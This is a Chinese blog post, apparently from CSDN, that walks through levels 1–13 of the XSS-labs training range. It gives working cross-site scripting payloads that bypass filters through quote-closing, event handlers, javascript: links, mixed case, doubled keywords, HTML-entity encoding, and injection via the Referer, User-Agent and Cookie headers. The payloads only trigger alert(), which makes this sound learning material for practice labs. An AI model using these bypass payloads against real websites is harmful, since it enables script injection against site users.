Web安全-XSS-基础06

已于 2022-02-18 15:33:32 修改
阅读量1.4k 收藏 1
点赞数
分类专栏: Web安全-XSS 文章标签: web安全 xss
于 2022-02-17 17:55:17 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45927819/article/details/122982309
版权

XSS-labs靶场练习1~13

第一关

在这里插入图片描述

第二关

在这里插入图片描述
input标签的属性值value中,闭合">,构建payload

"><script>alert(123)<script>

在这里插入图片描述

第三关

查看网页源代码,需要闭合单引号>
在这里插入图片描述
构建payload:

'><script>alert(1)</script>

发现<>被实体化了

在这里插入图片描述

在这里插入图片描述在这里插入图片描述

payload:

' οnmοuseοver='alert(123)'
' οnmοusemοve='alert(123)'

在这里插入图片描述

第四关

<>被过滤了

在这里插入图片描述
构建payload:

" οnmοusemοve="alert(123)

在这里插入图片描述

第五关

payload:

">123acada<script>alert(1)</script>

发现script中间被加上了一个杠

在这里插入图片描述
尝试鼠标事件:

" onmousemove='alert(123)'

依旧被添加了_
在这里插入图片描述
尝试js伪协议
就是使用a标签的href来运行javascript的方法
这里的script没有被过滤!

"> <a href=javascript:alert('xss') > xss</a>

在这里插入图片描述

第六关

script,on开头,以及href都被限制了
在这里插入图片描述到这里我才突然想起来大小写绕过。。。。。。。。。。。之前的应该也可以这样:
payload:

"><ScRipt>alert(1)</script>

在这里插入图片描述

第七关

script被过滤!
在这里插入图片描述
尝试双写绕过:
payload:

"><scscriptript>alert(1)</scscriptript>

在这里插入图片描述

第八关

可以添加友情链接,enmm尝试JAVASCRIPT伪协议

在这里插入图片描述javascript:alert(1)

被限制了
在这里插入图片描述尝试大小写:

javaScRipt:alert(1)

还是无法绕过。
尝试编码绕过:

javascript:alert(1)

直接把scirpt转成实体&#115;&#99;&#114;&#105;&#112;&#116;
payload:

java&#115;&#99;&#114;&#105;&#112;&#116;:alert(1)

在这里插入图片描述

第九关

第九关跟第八关相比多了一个判断,判断链接是否合法

if(false===strpos($str7,'http://'))
 
{
 
  echo '<center><BR><a href="您的链接不合法?有没有!">友情链接</a></center>';
 
 }

payload:

&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;:alert('http://xss')

在这里插入图片描述

第十关

没有头绪,查看源代码会发现有三个input标签,看来是通过t_sort来传递参数的,但标签都被隐藏了,只能我们自己构造按钮,触发事件

在这里插入图片描述
payload:

&t_sort="123" type="text" onclick="alert('xss')

在这里插入图片描述

第十一关

查看源代码:
发现多了一个$str11=$_SERVER['HTTP_REFERER'];
referer传参

在这里插入图片描述看来需要自己添加referer头,添加的值绘被传入t_ref

在这里插入图片描述

构造payload1:
创建一个按钮,点击可以触发xss

referer: click me!" type="button" οnclick="alert(xss)

在这里插入图片描述
payload2:
创建一个文本框,鼠标移动上即可触发xss

referer:123" type="text" οnmοuseοver="alert('123')

在这里插入图片描述

第十二关

在这里插入图片描述
UA处注入即可,构建payload:

click me!" type="button" οnclick="alert('xss')

在这里插入图片描述

在这里插入图片描述

第十三关

cookie处注入
payload同上
在这里插入图片描述

在这里插入图片描述

Stray.io
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
国信安web安全——xss-labs
学习记录
03-01 224
一、Xss-labs第一关 1.部署xss-labs 2.打开第一关 3.将url中name=后面内容更改为下。 二、Xss-labs第二关 1.打开第二关,查看网站源码找到格式后在url修改,得到弹窗 三、Xss-labs第三关 找到漏洞潜在页面的前端输入点 插入xss代码 观察返回页面的渲染情况 如果测试脚本未成功执行,则 查看页面源码 后端代码处理提交内容的方式 利用不同js执行方式寻求绕过 利用其他方式绕过 5.测试脚本成功执行 根据情况决定是否采取实战行
Web安全XSS
chuxuezheerer的博客
01-20 196
XSS原理 攻击内容 如何防御
Web安全-XSS-基础05
qq_45927819的博客
02-16 1522
XSS Challenges靶场练习stage 1(无过滤)stage 2(属性中的XSS注入)stage 3(选择列表中的 XSS 注入)4.Stage #4 在隐藏域中注入 XSS5.Stage 5 (限制输入长度的解决方法)6.Stage 6 (限制输入 <> XSS的注入)7.Stage 7 (限制输入引号的 XSS 注入)8.Stage 8 (JavaScript伪协议)9.Stage 9 (UTF-7编码注入)10.Stage 10 (绕过关键字domain) 靶场:https://
Web安全原理(2)——XSS
yuluotianjin的博客
09-03 306
1.XSS简介 跨站脚本攻击(Cross-Site Scripting,XSS)是针对网站应用程序的安全漏洞攻击技术,也是一种代码注入技术。攻击者往Web页面里插入恶意Script代码,当其他用户浏览网页触发恶意代码就会遭到攻击。 这里的跨站访问,可以是从正常的网站跨到黑客的服务器,也可以是黑客的服务器跨到正常的网站。 XSS漏洞通常是通过php的输出函数将javascript代码输出到html页面中,通过用户本地浏览器执行的,所以XSS漏洞关键就是寻找参数未过滤的输出函数。 XSS攻击分为三种:反射型、存
007-Web安全基础3---XSS漏洞(CISP-PTE).pptx
10-18
007-Web安全基础3---XSS漏洞(CISP-PTE).pptx
web--xss:web安全xss攻击、以及如何防范
05-18
Web XSS(跨站脚本)攻击是网络安全领域中一种常见的威胁,主要针对Web应用程序。XSS攻击通过在用户的浏览器中注入恶意脚本,利用网站的信任关系来窃取用户数据、执行非授权操作或者进行钓鱼攻击。本文将深入探讨XSS...
007-Web安全基础3 - XSS漏洞.pptx
10-11
XSS(cross site script)或者说跨站脚本是一种Web应用程序的漏洞,恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。
Web安全公开课-SQL注入-基础
r_deku的博客
03-31 176
数据库结构:列名后面加个desc就是倒序排列
Web安全之SQL注入:如何预防及解决
J老熊
09-07 1401
SQL注入是一种通过在用户输入中嵌入恶意SQL代码的攻击方式。攻击者可以利用漏洞在未经授权的情况下访问数据库,执行原本不被允许的操作。例如,攻击者可以绕过身份验证、检索敏感信息,甚至删除数据。SQL注入是Web应用程序中最常见且最危险的安全漏洞之一,尤其是在涉及数据库操作的场景下,如电商交易系统。通过使用、严格的输入验证、最小权限原则以及使用ORM框架等方法,我们可以有效防止SQL注入攻击。开发人员需要养成良好的编码习惯,始终考虑潜在的安全问题,确保应用程序的安全性。
【网络安全】漏洞挖掘
anquan2233的博客
08-29 1795
在springframeworl/expression/spel/stand/InternalSpelExpressionParser/doParseExpression()方法中、会在tokenizer.process()中 对token进行 源码与字节码的判断操作、继续向下。会进入到springframework/cloud/function/context/config/RoutingFunction/functionFromExpression()方法。Payload 的构造可以参考官方测试用例。
网络安全实训八(y0usef靶机渗透实例)
Wrop的博客
09-12 131
y0usef靶机渗透实例
如何用3个月零基础入门网络安全?_网络安全基础怎么学习
2401_84466224的博客
09-11 686
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
网络安全(黑客)自学
白帽子凯哥聊黑客
09-04 1731
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
【网络安全】服务基础第二阶段——第五节:Linux系统管理基础----Linux常见应用服务(Apache、数据库)
goldfish8848的博客
09-12 715
在Linux系统中,有许多常见的应用服务,它们用于执行各种任务,如网页托管、数据库管理、文件传输等。
网络安全宣传周 | DNS安全威胁与应对措施分享
最新发布
weixin_53018687的博客
09-12 605
然而,DNS协议在设计初期只注重功能的实现,未充分考虑安全验证机制,缺乏有效的安全防御手段,DNS协议数据包往往能够在网络中畅通无阻,为攻击者提供了可乘之机,这一天生的设计缺陷使得DNS系统天然地成为了安全领域的薄弱环节。DNS劫持:DNS劫持是指攻击者通过篡改DNS解析结果,将用户的流量重定向到不同的IP地址,通常是恶意网站。DNS泛洪攻击:DNS洪泛攻击是一种拒绝服务攻击,攻击者通过发送大量的DNS请求,通常是伪造的或毫无意义的查询,消耗DNS服务器的资源,使其无法响应合法的查询请求。
国家网络安全宣传周 | 2024年网络安全领域重大政策法规一览
WAJXY2021的博客
09-12 739
整理了2024年国内发布的网络安全领域相关政策法规,希望能为广大从业者与关注者提供相关参考,共同促进网络安全生态的健康发展。
深入解析反射型 XSS 与存储型 XSS:原理、危害与防范
2301_77160226的博客
09-05 829
反射型 XSS 和存储型 XSS 都是常见的 XSS 攻击类型,它们的原理和危害有所不同,但都可以对用户造成严重的危害。为了防范 XSS 攻击,我们需要采取一系列的措施,如输入验证和过滤、输出编码、使用安全的 API 和框架等。同时,我们也需要教育用户提高安全意识,不要点击来自不可信来源的链接,不要在不可信的网站上输入敏感信息。
Web安全与网络安全:SQL漏洞注入
hong161688的博客
09-10 704
Web安全领域,SQL注入漏洞(SQL Injection Vulnerability)是一种极具破坏性的安全威胁。它允许攻击者通过向Web应用程序的输入字段中插入或“注入”恶意的SQL代码片段,从而操纵后台数据库系统,执行未授权的数据库查询,甚至可能获取数据库管理权限,进而对整个系统造成严重的安全损害。本文将从SQL注入的原理、分类、危害及防御策略等方面进行详细阐述。
理解Web安全基础XSS漏洞详解与防护
"007-Web安全基础3 - XSS漏洞.pptx" 这篇文档主要讲解了Web安全领域中的一个重要话题——XSS(Cross Site Scripting)漏洞,它是一种允许恶意攻击者在Web页面中注入可执行脚本的漏洞。XSS攻击的主要目标是欺骗用户...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值